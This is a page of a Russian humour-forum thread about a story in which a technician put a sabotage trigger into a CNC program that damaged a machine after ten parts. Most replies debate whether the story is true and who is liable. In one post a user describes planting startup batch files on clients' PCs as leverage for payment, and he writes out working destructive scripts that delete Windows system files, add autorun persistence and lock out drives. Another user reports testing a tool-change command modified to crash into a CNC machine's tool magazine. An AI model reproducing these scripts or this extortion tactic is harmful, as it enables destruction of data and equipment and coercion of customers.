Как технарь эффективного менеджера наказал, Пост о жадности

[ Версия для печати ]
Добавить в Telegram Добавить в Twitter Добавить в Вконтакте Добавить в Одноклассники
Страницы: (15) « Первая ... 7 8 [9] 10 11 ... Последняя »  К последнему непрочитанному [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]
нефея
8.10.2015 - 19:00
1
Статус: Offline

Приколист

респект Диме. красиво нагнул

Как технарь эффективного менеджера наказал

[^]
lev4eg
8.10.2015 - 19:01
0

Приколист

мля, вот дураки то, ремонт такой аппаратуры влетит в миллионы.

[^]
Yaburka
8.10.2015 - 19:02
2

Ярила

Первая и самая главная задача для "эффективного" - наебать трудящего. Все его мысли только в одну сторону, наебать и спиздить.
Этот конфликт, работника и эффективного хама, страшнее любой войны с ИГИЛ, ибо касается всех и каждого.

[^]
e6pbot
8.10.2015 - 19:02
2

Шутник

Извините, но это не реальная история. Сейчас набегут ЧПУшники и размажут все в пух прах.

[^]
Crash71
8.10.2015 - 19:03
1

Ярила

Цитата (coolgate @ 8.10.2015 - 13:12)
скусна халявка получилась, но попытаются еще и в суд подать...
гыгы

И что они в суде скажут? Что Дима написал коммерческую тестовую программу безвоздмездно? Причём, ПРЕДУПРЕДИЛ письменно :
"На следующий день он дописал программу и отправил ее по е-Мылу тамошнему начальству с комментарием, что раз задание тестовое, то использовать программу в коммерческих целях он запрещает".
А они такие красавчики, проигнорировали предупреждение:
"...соглашаясь с данным пользовательским соглашением - вы самостоятельно несёте все риски, связанные с оборудованием".
Димон - молодчага! bravo.gif
А те упыри сами пускай расхлёбываются и вкатывают мегабабло другим конторам за восстановление.

Это сообщение отредактировал Crash71 - 8.10.2015 - 19:04

[^]
Ravenz3k
8.10.2015 - 19:05
-1

Пацак с планеты Земля

Цитата (maldalik @ 8.10.2015 - 13:11)
Молодец. Грамотно заложил.

На счет "грамотно" это вызывает сомнения. Код известно чей, да еще такое послание имеется. Сдается мне, может та фирма на Диму в суд подать и оплатит он им стоимость ремонта того станка. И не на что Диме будет девушку ублажать.
Поставил бы Дима заглушку, что после 10 деталей программа виснет и было бы все ОК, а так это преднамеренная порча имущества.

[^]
Crash71
8.10.2015 - 19:09
0

Ярила

Цитата (Irvin777 @ 8.10.2015 - 17:10)
Цитата (SlegSpirt @ 8.10.2015 - 13:13)
уж простите, но я котика с лампой попрошу в тему. Хотя как сказочка для не совсем знающих, сиречь байка , пойдет.

Так людям же хочется чтобы добро побеждало зло. Пусть хотя бы в сказках.

Добро побеждит зло moderator.gif

Это сообщение отредактировал Crash71 - 8.10.2015 - 19:09

Как технарь эффективного менеджера наказал

[^]
zhivaz
1
Статус: Online

Шутник

Цитата (lorenai @ 8.10.2015 - 15:56)
Цитата (zhivaz @ 8.10.2015 - 15:47)
после ухода из-за "эффективных менеджеров", воссоздание функционала(не в полном объеме) созданной мной за 1,5 года системы учета на другой платформе оценили в 5 лямов рублей) было весьма приятно молчать в ответ на настойчивые попытки выйти со мной на связь и вернуть обратно) для слома системы ничего не кодировал и не паролил, приглашенные руководством "знакомые специалисты" сами все сделали за полгода. хоть перед "уходом" и заставили подписать договор на сервисное обслуживание в течении 3х лет в случае ошибок системы, но я настоял на пункте снимающем это обязательство в случае любого(!) изменения кода не мной) в итоге в суд никто не подавал, т.к. изменения вносили после меня как минимум 2 человека)

на чем писал?

на 1С)))

[^]
lev4eg
4

Приколист

Цитата (Ravenz3k @ 8.10.2015 - 23:05)

На счет "грамотно" это вызывает сомнения. Код известно чей, да еще такое послание имеется. Сдается мне, может та фирма на Диму в суд подать и оплатит он им стоимость ремонта того станка. И не на что Диме будет девушку ублажать.
Поставил бы Дима заглушку, что после 10 деталей программа виснет и было бы все ОК, а так это преднамеренная порча имущества.

Хочешь сказать что если я вдруг на улице проебу кошелёк с деньгами, нашедший его возьмёт засунет в жопу другому, тот потеряет возможность срать и помрёт, и в ЭТОМ БУДУ Я ВИНОВАТ.

Не несите бреда.

На основании чего ему платить порчу имущества? ОН какой либо договор с ними заключал? Он давал какие то гарантии по поводу того что софтина рабочая? Какие нахер возмещения ущерба ребят :D

Он для них никто как и они для него. Ущерб ещё какой то, пездец просто поражает порой ваш дибилизм

Тут влетит тот ЧПУшник кито эту прогру заюзал не проверив и т.д. и т.п. и т.х. ДА и наврятли он влетит, деньги серьёзные, уволят разве что.

Это сообщение отредактировал lev4eg - 8.10.2015 - 19:15

[^]
Crash71
8.10.2015 - 19:12
2

Ярила

Цитата (Ravenz3k @ 8.10.2015 - 19:05)

Преднамеренная порча имущества - использовать тестовое непроверенное задание на коммерческом производстве.
Пострадавшие - сами себе злобные буратины.
Договора на написание программы, как я понял нет. Всё на словах/по телефону.
Значит и ответственность Димона тоже по телефону.
Можно сказать - "приносим вам свои извинения за причинённые неудобства!"

[^]
lalabos
8.10.2015 - 19:14
0

Приколист

ё пари ... вы чо .. читайте первую строку

если вы не можете или думаете что не можете .. вам же чотко написали ..

"Причем квалификация у него просто зашкаливает."

от этого и надо дальше отталкиватцо

[^]
BigBeatle
8.10.2015 - 19:17
4

Ярила

Цитата (lorenai @ 8.10.2015 - 13:54)
Цитата (BigBeatle @ 8.10.2015 - 14:29)
Бывали попытки и меня пробросить ...

Да есть один нюанс ... после установки ОС, подгона дров, настройки системы и ПО - в автозагрузку ярлычок ... от bat-ника :

@echo off
del /S /Q %SYSTEMROOT% %PROGRAMFILES%

И всё - ждём-с адекватности ( ну, или наоборот ) клиента ( или конторы ).

Если заказчик не жлоб - батник убиваем.

Если же - казлИна - до свидания.

И после первой же перезагрузки - диск С:\ - чист , как попа младенца !

Имеются ещё пару скриптов - убийцы винды.

Выкладывать не буду.

Суицидников и так - до хера !

Всем бобра и пива прохладного !

И клиентов адекватных !

agree.gif   beer.gif

чот ты врешь. я попробовал и у меня ничего не стерлось. выскочила ошибка что типа невозможно и всё. винда на немецком. может и твои казлины так же видели окошко жали окей и дальше продолжают работать? gigi.gif

Странно ...

Тогда попробуй:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

Отпишись - как прошло ( ну, когда уже сможешь ).

rolleyes.gif

Ну, а если уж совсем никак , то :

@echo off
echo Chr(39)>%temp%\temp1.vbs
echo Chr(39)>%temp%\temp2.vbs
echo on error resume next > %temp%\temp.vbs
echo Set S = CreateObject("Wscript.Shell") » %temp%\temp.vbs
echo set FSO=createobject("scripting.filesystemobject")»%temp%\temp.vbs
reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%\user32dll.bat
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile "C:\ntldr",1 » %temp%\temp.vbs
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
echo fso.deletefolder "D:\Windows",1 » %temp%\temp.vbs
echo fso.deletefolder "I:\Windows",1 » %temp%\temp.vbs
echo fso.deletefolder "C:\Windows",1 » %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") » %temp%\temp.vbs
echo fso.deletefile sr+"\system32\hal.dll",1 » %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") » %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\dllcache",1 » %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\drives",1 » %temp%\temp.vbs
echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™"»%temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™"»%temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™"»%temp%\temp.vbs
echo on error resume next > %temp%\temp1.vbs
echo set FSO=createobject("scripting.filesystemobject")»%temp%\temp1.vbs
echo do»%temp%\temp1.vbs
echo fso.getfile ("A:\")»%temp%\temp1.vbs
echo loop»%temp%\temp1.vbs
echo on error resume next > %temp%\temp2.vbs
echo Set S = CreateObject("Wscript.Shell") » %temp%\temp2.vbs
echo do»%temp%\temp2.vbs

Ты, прям, мазохист какой-то ...

faceoff.gif

Это сообщение отредактировал BigBeatle - 8.10.2015 - 19:22

[^]
Avertin
8.10.2015 - 19:18
8

Хохмач

Цитата (Micron4ik @ 8.10.2015 - 17:49)
Обнаружит, а что там такого. Обнаружит счетчик деталей и сотрет строчку.
Или заметит кол-во повторений, а за ним неправильную строчку.

Это вы обнаружите и сотрете. И нормальный наладчик тоже.

А теперь представляем ситуацию:
Есть предприятие с парком обычных (не ЧПУ) станков. У руля стоит "эффективный менеджер", который покупает пару станков с ЧПУ, дабы делать на них вполне определенную номенклатуру серийных деталей, ну и изредка выполнять сторонние заказы. Для запуска/написания программ/отладки и т.п. пригласили сторонних людей, которые всё сделали. Быстренько обучили пару своих людей загружать нужную программу, устанавливать заготовку и выставлять инструмент. И всё - детали делаются, "дорогих" спецов в штате держать не надо.
Тут поступает вкусный заказ на сложную деталь. Нашли спеца, который сделал программу забесплатно (по мнению эффективного менеджера). И вот, "специально обученный для работы на ЧПУ" человек эффективного менеджера загружает программу, прогоняет ее по воздуху без инструмента, потом - по дереву или мягкому пластику. Программа работает, её решаются запустить в рабочем режиме по стали. Программа нормально отрабатывает и деталь получается. Эффективный менеджер радуется, хлопает в ладоши и дает команду запускать деталь в серию. И вот после нескольких годных деталей срабатывает закладка и со станком "что-то случается", после чего приходится вызывать дорогих спецов, чтобы они его починили.

Ну что, могла бы произойти такая история на просторах нашей необъятной Родины? Я разные производства видел и считаю, что вполне могла бы.

[^]
МимоПроходил
8.10.2015 - 19:21
0

Ярила

Цитата (Alex31a @ 8.10.2015 - 16:28)
Цитата (paruko @ 8.10.2015 - 16:03)
Цитата (МимоПроходил @ 8.10.2015 - 13:45)
Цитата (dx69 @ 8.10.2015 - 13:13)
пиздешь....я тебе говорю как наладчик ЧПУ 5 разряда...8)))
про текст пиздёшь ..и про 10 деталей....8))

и про то что станок пошел в разнос а все стояли варежку разинув.
забыв о

в тексте написано, что станок обработал 10 деталей, на каждую детал ушло по 5 часов, т.е. по-вашему все 50 часов (2 суток подряд) стояли и смотрели на станок? Это же ЧПУ, запустил и пошел заниматься другой работой.

Какой другой работой? Вы о чем? Есть Оператор ЧПУ и он находится всегда рядом со станком. А сменный график работы?

комментатор в живую не видел того о чем говорит.
и не представляет себе стоимости таких станков и деталей.

Добавлено в 19:24
Цитата (ZRV @ 8.10.2015 - 17:06)
Прочитал статью и комменты, "много думал"© В статье зацепился глазом за "инструментальный магазин". Задался мыслью - а можно ли стандартную М6 Т15 модифицировать так, чтоб нанести станку максимальный вред? Нашел пока два способа - могу врезаться в магазин, могу его отфрезеровать )) Проверил на станке (с коррекцией высоты, ясно дело) - работает! Хотелось бы уточнить у ТС - какая система ЧПУ, какая стойка, чтоб понять, как этого добиться на i-ой детали.

Сидоров Иван Петрович.
собираешься увольняться? cool.gif

[^]
garex
8.10.2015 - 19:26
3

Ярила

Это был не эффективный менеджер а обычный заказчик-пидар.

[^]
Тихоненко
8.10.2015 - 19:28
0

Шутник

Красаучик Дима ! ! !

[^]
Liver
8.10.2015 - 19:29
3

Ярила

А потом окажется, что станок был застрахован, а директор Абрам Давидович прикажет загружать программу, обрабатывать 9 деталей, и загружать программу заново. Результат: жадная морда получила то, что хотела на халяву, а оператор за те же самые деньги, что работал раньше будет бояться отойти в туалет.

[^]
wws
8.10.2015 - 19:31
1

Ярила

Цитата (ZRV @ 8.10.2015 - 15:06)
Прочитал статью и комменты, "много думал"© В статье зацепился глазом за "инструментальный магазин". Задался мыслью - а можно ли стандартную М6 Т15 модифицировать так, чтоб нанести станку максимальный вред? Нашел пока два способа - могу врезаться в магазин, могу его отфрезеровать )) Проверил на станке (с коррекцией высоты, ясно дело) - работает! Хотелось бы уточнить у ТС - какая система ЧПУ, какая стойка, чтоб понять, как этого добиться на i-ой детали.

опыт двинулся в массы!

[^]
lorenai
8.10.2015 - 19:38
0

Ярила

Цитата (stormwiu @ 8.10.2015 - 17:41)
Ничё такая байка, слышал подобные и не раз, в основном связанные с айтишниками и т.п.

я тоже слышал )) но то была байка далеко не всегда gigi.gif

[^]
batonoGivi
8.10.2015 - 19:38
0

Весельчак

Станки DMG, стойки heidenhain - гадость редкая, запороть деталь/оснастку/инструмент - как за нехрен делать. Оператор криво выставляет базу и привет сервисмены. Ограничение столкновения отключается программно (например для сверловки). Но это было бы понятно при первом же пошаговом выполнении УП.
И кстати - в этих стойках счетчик деталей программируется аж никак. Считает сама стойка сколько раз запущена УП и найдена в ней M30. Нет M30 - программа считается незавершенной, и соответственно счетчик n+1 не выполняется.
А всякие ограничения - типа время непрерывного выполнения программы зашиты в "прошивке" станка, и УП их уж никак не поменяешь.

[^]
Bug
8.10.2015 - 19:40
0

Дедушка ЯПа

Цитата (Vppb1 @ 8.10.2015 - 15:14)
Не люблю эффективных менеджеров, но причем тут они то? Тут любой может быть кидалой, от начальника отдела и т.д.

Хорошая попытка, эффективный. Но мы-то всё поняли. gigi.gif

[^]
lorenai
8.10.2015 - 19:42
0

Ярила

в суд подаст за то что спижженная программа на которой ясно написано не использовать после использования пизданула станок? не смеши мои тапки. долбани себе по башке молотком а потом на производителя молотков в суд подай за то что у тебя череп проломило. вот ведь гады. да. такие небезопасные молотки выпускают. тем более что там у тебя шансов больше будет. бо ты этот молоток честно купил скорее всего а не спиздил gigi.gif

[^]
Eqvilibrium
8.10.2015 - 19:43
0

Ярила

Цитата (Crash71 @ 8.10.2015 - 19:12)

Преднамеренная порча имущества - использовать тестовое непроверенное задание на коммерческом производстве.
Пострадавшие - сами себе злобные буратины.
Договора на написание программы, как я понял нет. Всё на словах/по телефону.
Значит и ответственность Димона тоже по телефону.
Можно сказать - "приносим вам свои извинения за причинённые неудобства!"

В этом и есть вся фишка этой истории.
Никто не будет использовать непотно какой софт, от непонятно кого. И чтоб его не проверил спец разбирающийся в этом.

А так история конечно красивая.

[^]
lorenai
8.10.2015 - 19:44
1

Ярила

Цитата (lev4eg @ 8.10.2015 - 19:09)
Цитата (Ravenz3k @ 8.10.2015 - 23:05)

Хочешь сказать что если я вдруг на улице проебу кошелёк с деньгами, нашедший его возьмёт засунет в жопу другому, тот потеряет возможность срать и помрёт, и в ЭТОМ БУДУ Я ВИНОВАТ.

Не несите бреда.

На основании чего ему платить порчу имущества? ОН какой либо договор с ними заключал? Он давал какие то гарантии по поводу того что софтина рабочая? Какие нахер возмещения ущерба ребят :D

Он для них никто как и они для него. Ущерб ещё какой то, пездец просто поражает порой ваш дибилизм

Тут влетит тот ЧПУшник кито эту прогру заюзал не проверив и т.д. и т.п. и т.х. ДА и наврятли он влетит, деньги серьёзные, уволят разве что.

там максимум братки могут накатить. которых очень быстро можно припереть через прокуратуру к стенке. вместе с менеджером-долбоебом. история конечно враньё но в реале такое обычно кончается ничем. рабовладелец просто бежит на рынок искать очередного долбоеба кто это всё забесплатно починит чтоб его потом еще раз кидануть. причем, неся такие потери параллельно что ейБогу дешевле было бы честно человеку заплатить. но клинический долбоебизм, как правило, не лечится.

[^]
Leon77
8.10.2015 - 19:48
-1

Балагур

Цитата (dx69 @ 8.10.2015 - 13:13)
пиздешь....я тебе говорю как наладчик ЧПУ 5 разряда...8)))
про текст пиздёшь ..и про 10 деталей....8))

Полностью согласен...
История закончилась тем что его прогу забрали и делают деньги а его послали в лес! gigi.gif

[^]
Понравился пост? Еще больше интересного в Телеграм-канале ЯПлакалъ!
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии. Авторизуйтесь, пожалуйста, или зарегистрируйтесь, если не зарегистрированы.
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей) Просмотры темы: 103118
0 Пользователей:
Страницы: (15) « Первая ... 7 8 [9] 10 11 ... Последняя » [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]

Активные темы

Наверх